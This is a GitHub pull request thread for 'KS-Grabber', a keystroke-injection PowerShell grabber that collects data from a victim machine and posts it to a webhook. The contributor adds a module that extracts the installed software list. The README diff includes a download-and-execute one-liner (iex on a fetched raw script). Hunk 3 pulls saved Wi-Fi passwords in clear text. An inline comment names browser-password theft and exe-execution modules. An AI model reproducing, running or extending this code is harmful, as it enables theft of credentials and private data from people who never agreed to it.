### PR TITLE
Added Feautures - Softwares list

### PR DESCRIPTION
**Pull request by Hosseios**
Added "Installed Software List" extraction

### CODE REVIEW

File: README.md [hunk 1]
```diff
@@ -2,13 +2,21 @@
...
+
+
 ## Usage
 
 Run the following command in PowerShell to execute KS-Grabber:
 
 ```powershell
 $hookurl = '<webhook goes here>'
-iex (iwr https://raw.githubusercontent.com/Niximkk/ks-grabber/main/ks-grabber.ps1).content
+iex (iwr https://raw.githubusercontent.com/Hosseios/ks-grabber/main/ks-grabber.ps1).content
```
Comment (Niximkk) [inline README.md]: Uh...

**Review by Niximkk — CHANGES_REQUESTED** [review]
Just change the readme url ;)

**Comment by Hosseios** [comment]
> Just change the readme url ;)

Changed ! I wasn't sure what it should be there

**Comment by Niximkk** [comment]
Dude, i forgot your PR sorry 😭!!
I changed the code a bit....

File: ks-grabber.ps1 [hunk 2]
```diff
@@ -38,6 +38,7 @@ if (-not (Test-Path variable:gatherPcData)) {   $gatherPcData = $true }
 if (-not (Test-Path variable:gatherWifiProfiles)) {   $gatherWifiProfiles = $true }
 if (-not (Test-Path variable:gatherOpenPorts)) {   $gatherOpenPorts = $true }
 if (-not (Test-Path variable:removeTraces)) {   $removeTraces = $true }
+if (-not (Test-Path variable:gatherInstalledSoftware)) { $gatherInstalledSoftware = $true }
```
Comment (Niximkk) [inline ks-grabber.ps1]: New way to check modules...
```powershell
$features = @{
    "gatherPcData" = $true
    "gatherWifiProfiles" = $true
    "gatherOpenPorts" = $true
    "executeExe" = $false
    "gatherBrowserPass" = $false
    "gatherInstalledSoftware" = $true
    "removeTraces" = $true
}
```

File: ks-grabber.ps1 [hunk 3]
```diff
@@ -50,7 +51,7 @@ if ($gatherWifiProfiles) {
     Write-Output "[ + ] Gathering wifi profiles"
     $WirelessSSIDs = (netsh wlan show profiles | Select-String ': ' ) -replace ".*:\s+"
     $WifiInfo = foreach($SSID in $WirelessSSIDs) {
-        $Password = (netsh wlan show profiles name=$SSID key=clear | Select-String 'Conteúdo da Chave') -replace ".*:\s+" # Todo: Make a language based key content shit, if you are not brazilian womp womp, wont work.
+        $Password = (netsh wlan show profiles name=$SSID key=clear | Select-String 'Key Content') -replace ".*:\s+" # Todo: Make a language based key content shit, if you are not brazilian womp womp, wont work.
```
Comment (Niximkk) [inline ks-grabber.ps1]: No need for that anymore.

File: README.md [hunk 4]
```diff
@@ -2,6 +2,14 @@
 
 KS-Grabber is a keystroke injection grabber that is fully modular and developed with PowerShell. This script allows you to collect information from various sources and send it to a webhook.
 
+## Functions
```
Comment (Niximkk) [inline README.md]: Follow the new template pls :)

**Review by Niximkk — CHANGES_REQUESTED** [review]
Really sorry dude :(

**Comment by Hosseios** [comment]
> Dude, i forgot your PR sorry 😭!! I changed the code a bit....

It's fine, i saw the changes i will adapt to it :D 
i see great feautures coming soon.

**Pull request merged**